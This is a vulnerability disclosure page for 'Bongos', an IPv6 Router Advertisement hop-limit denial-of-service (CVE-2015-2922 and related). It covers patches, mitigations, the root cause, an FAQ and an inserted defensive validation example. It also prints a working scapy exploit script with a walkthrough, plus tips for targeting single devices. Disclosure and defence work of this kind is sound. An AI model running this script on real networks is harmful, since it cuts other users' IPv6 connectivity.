Bongos


It's not the end of the internet

About Bongos

Bongos is a cross-platform, LAN-based security problem that leads to Denial of Service. It effectively ruins your device's or computer's ability to communicate over IPv6.

It requires an extremely low rate of packets, around one per second. It (usually) only works for as long as the stream of packets is being emitted.

This is not the end of the world. The following page will contain an FAQ, links to vulnerabilities, patches, protection, comments and more.

Contact us at info@modio.se for more information.

News

2015-04-23 - Fedora releases kernel update

Fedora users can now get a kernel update that includes a patch for Bongos.

Bug #1203712 - CVE-2015-2922 kernel: denial of service (DoS) attack against IPv6 network stacks due to improper handling of Router Advertisements. https://bugzilla.redhat.com/show_bug.cgi?id=1203712


2015-04-16 - pfsense 2.2.2 patched

There is now a patch for pfsense.

FreeBSD-SA-15:09.ipv6: Denial of Service with IPv6 Router Advertisements. Where a system is using DHCPv6 WAN type, devices on the same broadcast domain as that WAN can send crafted packets causing the system to lose IPv6 Internet connectivity.


2015-04-08 - CVE and patches

For the Linux kernel, we have CVE-2015-2922.
For FreeBSD, we have CVE-2015-2923. For NetworkManager there is CVE-2015-2924.

Patches are part of Linux 4.0-rc7, and there are advisories for FreeBSD and DragonFly BSD.


Preparation

Before we release details that may lead to reproduction of the issue, there are a few things that you can do, both as a user and as a systems administrator.

For everyone

  • Install your updates, automatically and quickly
  • Make sure your firewall is up to date and running

For the SysAdmins

  • Turn on IPv4 port-based DHCP filtering in your switches
  • Turn on port-based DHCPv6 filtering in your switches
  • Turn on port-based Router Advertisement filtering in your switches
  • Make sure you have host-based firewalls installed and enabled
  • Make sure you can quickly and automatically push updates to your host-based firewalls.
  • Make sure clients are on different networks/VLAN from your infrastructure
  • Make sure your networking infrastructure cannot be reached from normal clients

The above advice is all we can give right now. We will update this section with proper firewall rules for some platforms, and with more detailed advice once the updates have been pushed by vendors.

The cause

Many systems accept link settings from a link-local Router Advertisement packet that doesn't contain any route. This allows a link-local attacker to change interface-level settings, more specifically the Hop Limit.

Result of the attack

The Hop Limit is reduced to 1. This means that IPv6 packets originating from the device are discarded after the first routing hop, which effectively disables IPv6 connectivity beyond the local network.

The root cause:

The ignored lines of RFC3756:

As an example, one possible approach to mitigate this threat is to ignore very small hop limits. The nodes could implement a configurable minimum hop limit, and ignore attempts to set it below said limit.

The obeyed lines of RFC4861:

  • The IP Hop Limit field has a value of 255, i.e., the packet could not possibly have been forwarded by a router.
  • ICMP Checksum is valid.
  • ICMP Code is 0.
  • ICMP length (derived from the IP length) is 16 or more octets.
  • All included options have a length that is greater than zero.

And most importantly:

If the received Cur Hop Limit value is non-zero, the host SHOULD set its CurHopLimit variable to the received value.

With this implemented, we can send an RA packet without any options: no route, no nothing. The client will accept the packet, validate only the small basics listed above, and apply the hop limit to the interface.

This then causes all outgoing traffic from the host to have a hop limit of 1, leading to an effective "Game Over".

Had the suggestion in RFC3756 been implemented, this situation would have been avoided. In fact, a careful reading of RFC4861 suggests that a Router Advertisement without options, and with a lifetime != 0, can be considered an invalid RA packet and should be discarded.
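The following is an added example, not code from the original page or from any vendor's stack: a receive-side check over raw ICMPv6 bytes that applies the RFC4861 validity rules quoted above, adds the RFC3756 configurable minimum hop limit, and drops an option-less RA with a non-zero lifetime as the paragraph suggests. The minimum of 32, the helper names and the sample packets are assumptions; the checksum and the link-local source address check are assumed to be done by the stack beforehand.

```python
import struct

ND_ROUTER_ADVERT = 134   # ICMPv6 type of a Router Advertisement
RA_HEADER_LEN = 16       # type, code, csum, chlim, flags, lifetime, reachable, retrans

def validate_ra(ip_hop_limit, icmp, min_cur_hop_limit=32):
    """Return (accepted, cur_hop_limit_to_apply_or_None, reason).

    RFC 4861 receipt checks first, then the RFC 3756 minimum-hop-limit
    policy (32 is an assumed value). Checksum assumed already verified.
    """
    if ip_hop_limit != 255:
        return False, None, "IPv6 Hop Limit != 255: packet may have crossed a router"
    if len(icmp) < RA_HEADER_LEN:
        return False, None, "ICMPv6 length below 16 octets"
    typ, code, _csum, chlim, _flags, lifetime, _reach, _retrans = struct.unpack(
        "!BBHBBHII", icmp[:RA_HEADER_LEN])
    if typ != ND_ROUTER_ADVERT or code != 0:
        return False, None, "not a Router Advertisement with ICMP code 0"
    off, n_opts = RA_HEADER_LEN, 0           # walk the TLV options
    while off < len(icmp):
        if off + 2 > len(icmp):
            return False, None, "truncated option header"
        opt_len = icmp[off + 1] * 8           # option length is in units of 8 octets
        if opt_len == 0:
            return False, None, "option with zero length"
        off += opt_len
        n_opts += 1
    if off != len(icmp):
        return False, None, "option runs past the end of the packet"
    # Page's reading of RFC 4861: a router lifetime with no options at all
    # (exactly the Bongos packet) is not a valid RA.
    if n_opts == 0 and lifetime != 0:
        return False, None, "non-zero router lifetime but no options"
    if chlim == 0:                            # RFC 4861: zero means "unspecified"
        return True, None, "Cur Hop Limit unspecified: keep current value"
    if chlim < min_cur_hop_limit:             # RFC 3756: ignore very small values
        return True, None, "Cur Hop Limit %d below minimum %d: ignored" % (chlim, min_cur_hop_limit)
    return True, chlim, "Cur Hop Limit applied"

def build_ra(chlim, lifetime, options=b""):
    """Constructed sample RA bytes for testing (checksum field left as zero)."""
    return struct.pack("!BBHBBHII", ND_ROUTER_ADVERT, 0, 0, chlim, 0, lifetime, 0, 0) + options

# Constructed samples: a Bongos-style RA (chlim 1, no options) and a normal RA
# carrying a Source Link-Layer Address option (type 1, length 1 = 8 octets).
BONGOS_RA = build_ra(1, 1800)
SLLA_OPT = bytes([1, 1]) + bytes.fromhex("020000000001")
NORMAL_RA = build_ra(64, 1800, SLLA_OPT)
```

Both the option-less Bongos packet and a small hop limit carried in an otherwise well-formed RA leave the interface's hop limit untouched, while an ordinary RA is still honoured.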

Questions and Answers

  • Is my data at risk?
  • No. There is no information leakage.
  • Can this stop the internet?
  • No. This attack is a local attack. It only affects devices near you.
  • Will I be affected?
  • Most likely, no. IPv6 is still not yet in wide deployment, and your device will likely get proper updates.
  • We use DHCPv6, are we still vulnerable?
  • Maybe. Even if your system only accepts routes via DHCPv6, it may still change the hop limit based on information from RA packets.
  • Can you crash a computer with this?
  • No. Nothing is crashing, there is only a disruption of service. Like a dropped phone call.
  • Will this take down the internet?
  • No. At most it will affect the WiFi in the coffee shop. If you experience issues, turn off your device and enjoy the coffee.
  • What makes this attack so unique?
  • The really interesting thing about this attack is that so many vendors are affected by it. It's exceptionally rare that an attack works on Android, iOS, Windows, OS X, networking hardware and embedded devices at the same time.
  • How can I protect myself?
  • See our news and announcement pages, and the block labeled "Preparations". It will be updated when we can release more news.
  • Are there any other side effects?
  • On some mobile devices we can provoke crashes in some apps, because they do not handle errors very well. This is a bug in the app, and is fixed by restarting it.
  • What's the worst thing that happens?
  • We have observed higher power consumption on mobile devices. This seems to be related to background services failing to get a connection and trying over and over again. We expect this to be fixed at a later point by the vendors.
  • Why are so many vendors affected?
  • Most vendors didn't properly validate the input data from the network, and missed a small suggestion in a standards document.
  • What are the risks for the future?
  • The real risk is devices that do not get updates: embedded, IoT, networking or mobile devices that no longer get security updates from the vendor. For these devices, the problem will continue to grow as more and more networks enable IPv6.
  • How did you come across this?
  • We at Modio work with security on embedded and networked devices. It started with an obscure networking problem, and further investigation showed that it was a serious infrastructure problem.
  • Did you have to name the exploit?
  • No. But it is amazing how many devices are affected at the same time, so we think this was a good time to name an exploit.
  • Can you crash any app with this?
  • No, there is no way to target this at a specific app. You can only target an entire network, or a set of devices on the network.
  • My vendor hasn't released a patch for this, what can I do?
  • If you "root" the device, you can apply a local firewall to protect against attack. Otherwise the device will remain vulnerable. See the Preparations part for details.
  • Why is it named Bongos?
  • Because you have to keep the rhythmical drumming for this to work in practice.

Exploit code

The following code includes a DoS, and an undo afterwards. Simply press Ctrl-C once while drumming, and it will start the undo sequence.

bongos.py

#!/bin/python
import scapy.all
from scapy.layers.inet6 import *

ip = IPv6()
ip.dst = "ff02::1"
icmp = ICMPv6ND_RA()

icmp.chlim = 1
print("Starting Bongos with hoplimit {0}".format(icmp.chlim))
send(ip/icmp, loop=True, inter=1)

icmp.chlim = 64
print("Restoring with hoplimit {0}".format(icmp.chlim))
send(ip/icmp, loop=True, inter=1)

Run the above code as root and it should work.

Explanation

First we set up scapy and import the IPv6 functions:

import scapy.all
from scapy.layers.inet6 import *

Then we declare an empty IPv6 packet, and set the destination to the link-local all-nodes multicast address:

ip = IPv6()
ip.dst = "ff02::1"

After this, we set up an ICMPv6 packet of type "NetworkDiscovery: RouterAdvertisement":

icmp = ICMPv6ND_RA()

Then we set the "CurrentHopLimit" (chlim) to 1, and fire it off to the network:

icmp.chlim = 1
send(ip/icmp, loop=True, inter=1)

We loop forever, sending one beat every second. There is no data-payload involved, only the empty RouterAdvertisement packet.

Once you press Ctrl-C, we restore the "CurrentHopLimit" to 64, and start another beat of the bongos. This is to restore any devices that are currently unavailable:

icmp.chlim = 64
send(ip/icmp, loop=True, inter=1)

More fun

This attack works both with the link-local all-nodes multicast address and with a unicast address. To target a single device, simply change the ip.dst variable.

Some other network stacks will get very upset if you also set the icmp.routerlifetime property of the packet down to 0.